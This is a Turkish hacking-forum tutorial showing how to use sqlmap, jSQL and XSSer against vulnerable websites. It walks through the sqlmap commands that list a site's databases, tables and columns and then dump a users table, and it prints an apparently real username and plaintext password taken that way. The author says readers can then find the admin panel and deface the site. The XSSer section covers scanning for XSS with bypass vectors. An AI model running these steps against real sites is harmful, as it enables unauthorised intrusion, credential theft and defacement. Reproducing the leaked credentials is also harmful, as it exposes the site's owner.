Web Explation Tools 1.Bölüm
Bu bölümde SQLMAP ve JSQL kullanımları anlatılacaktır.
Diğer toollar konu uzun olmasın diye bir sonraki bölüme bırakıldı.
yani Web Application Scanners 2'de diğer kısımlar anlatılacaktır..
+-----------------------------------------------------+
#Kali Linux Serisi#
#Web Application Scanners#
TurkHackTeam/Ceys
+-----------------------------------------------------+
SQLMAP KULLANIMI
Sql injection aracıdır.
Veritabanına erişmek ve verileri çekmek için kullanılır.
konsola sqlmap -h yazarak parametrelerine bakabilirsiniz.
Şimdi kullanımına geçelim bir örnek üzerinden anlatalım..
sqlmap -u açıklıurl.com --dbs
burada -u url adresini belirtir ve --dbs ifadesi taramayı başlatmasını istedik..
tarama bittikten sonra; bulunan veri tabanlarını görüyorsunuz..
information_schema
outbacklabs2
iki adet veri tabanı bulduk information_schema bununla işimiz yok
veri tabanını bulduktan sonra;
sqlmap -u açıklıurl.com --tables
komutundan faydalanarak tabloları çekiyoruz..
birçok tablo buldu ve 2 adet veritabanı var burda information_shema adlı vt ile işimiz yok diğeri bizim işimize yarıyor..
+---------------------------------------+
| tblcategory |
| tblinventory |
| tblsize |
| tbltype |
| tblusers |
+---------------------------------------+
bakın bu tabloda giriş bilgileri yer alıyor genelde user admin vs gibi isimler verilir..
Tabloları listeledikten sonra;
Tabloya ait kolonları listelememiz lazım..
sqlmap -u açıklı url -D outbacklabs2 -T tblusers --columns
bu komutu kullanrak ve gerekli bilgileri doldurarak kolonları çekelim..
+----------+---------+
| Column | Type |
+----------+---------+
| UserId | int(11) |
| UserName | text |
| UserPwd | text |
+----------+---------+
Kolonları listeledikten sonra;
sqlmap -u açıklıurl.com -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump
Komutundan yararlanarak veriyi çekiyoruz. birden fazla veri çekmek için kolon adlarını virgül ile ayırabilirsiniz.
+-----------------+-----------------+
| UserName | UserPwd |
+-----------------+-----------------+
| outbackproducts | showoutb@ck2014 |
+-----------------+-----------------+
bakın burda verileri çektik
kullanıcı adı : outbackproducts
parolası: howoutb@ck2014 bunlarmış.
Siz bunun admin panelini bularak siteye index atabilirsiniz...
VİDEOLU ANLATIM
[ame]https://www.youtube.com/watch?v=lnusH9AkfMU[/ame]
+-----------------------------------------------------+
#Kali Linux Serisi#
#Web Application Scanners#
TurkHackTeam/Ceys
+-----------------------------------------------------+
JSQL INJECTION KULLANIMI
Merhaba arkadaşlar bu videoda JSQL kullanımına bakacağız.
JSQL; basit bir SQL injection aracıdır.
Web site hacklemede işimize yarayan bir web application scannerdir.
Şimdi kullanımına bakalım..
aramaya yada konsola JSQL yazarak başlatabilirsiniz.
arama çubuğuna açıklı siteyi yazarak sağda bulunan ok işaretine yada entere basın..
Tarama siteye göre değişebilir..
Gördüğünüz gibi 2 adet veritabanı buldu..
sonuçlanana veritabanlarından information schema ile işimiz yok bunu sqlmapta da bahsetmiştik..
Diğer veri tabanının yanındaki yeşil ok işaretine tıklayarak sonuçları listeleyelim..
Listelenen tablolardan isime bakarak admin bilgilerinin hangisinde olduğuna karar verip,
tablonun yanındaki yeşil oka tıklayarak kolonları çekelim..
Burda 3 adet tablo var ve admin bilgileri login'de tutulıyor.
Açılan kolonlarda işimize yarayan yerlere tik bırakalım ve tablonun üzerine sağ tıklayarak Thread Yükü'ne tıklayalım
Yada LOAD yazabilir farketmez..
Gördüğünüz gibi sonuçları getirdi admin paneli bulma toollarından yararlaanrak siteyi deface edebilirsiniz..
VİDEOLU ANLATIM
[ame]https://www.youtube.com/watch?v=E84HSQfJjyI[/ame]
+-----------------------------------------------------+
#Kali Linux Serisi#
#Web Explation Tools 1.Bölüm#
TurkHackTeam/Ceys
+-----------------------------------------------------+
XSSER KULLANIMI
Bu araç xss tespiti için kullanılan bir araçtır.
xss teknikleri ve bypass yöntemlerinin de olduğu bir araç...
konsola
xsser -h
yazarak başlatabilirsiniz.
birçok parametresi vardır.
Bunların tümüne hakim olmak için xss'i detaylı bir şekilde araştırmanızı tavsiye ederim.
Küçük bir deneme:
Konsola;
xsser -u açıklıurl.com
yazıp enterleyin..
-u: xss açıklı urlyi belirtir.
sonuç olarak açığını varlığını ve payloadı veriyor..
Şimdi XSSER'in arayüzünü kullanalım..
bunun için konsola;
xsser --gtk
yazalım..
Fly Mode kısmında Intruder seçeneğini işaretliyoruz.
inuta tarayacağımız açığı yazıyoruz..
Açıklı url bilmiyorsanız direk url yazın ve crawler seçeneğini işaretleyin.
Daha sonra Aim! butonuna tıklayın Command kısmında konsola yazacağımız kodu veriyor.
Böyle yaparak konsolda daha iyi çalışabiliriz.
Dilerseniz Configure kısmında diğer ayarları yapabilirsiniz.
Burda cookie, header, User-agent, get, post ... gibi ayarları düzenliyoruz.
Vector kısmında bypass ve tekniklerini ayarlıyoruz. url kısmına xss payload' yazıyoruz..
Özelliklerinizi ayarladıktan sonra önce Aim! sonrada FLY butonuna basıyoruz.
Burda derleyip size xss açığını sunacaktır.
gördüğünüz gibi birçok açık buldu ve ayarladığımız parametreleride gösterdi..
VİDEOLU ANLATIM
[ame]https://www.youtube.com/watch?v=hHwup5HUEa0[/ame]
Sağlıcakla kalın //Ceys
Son düzenleme: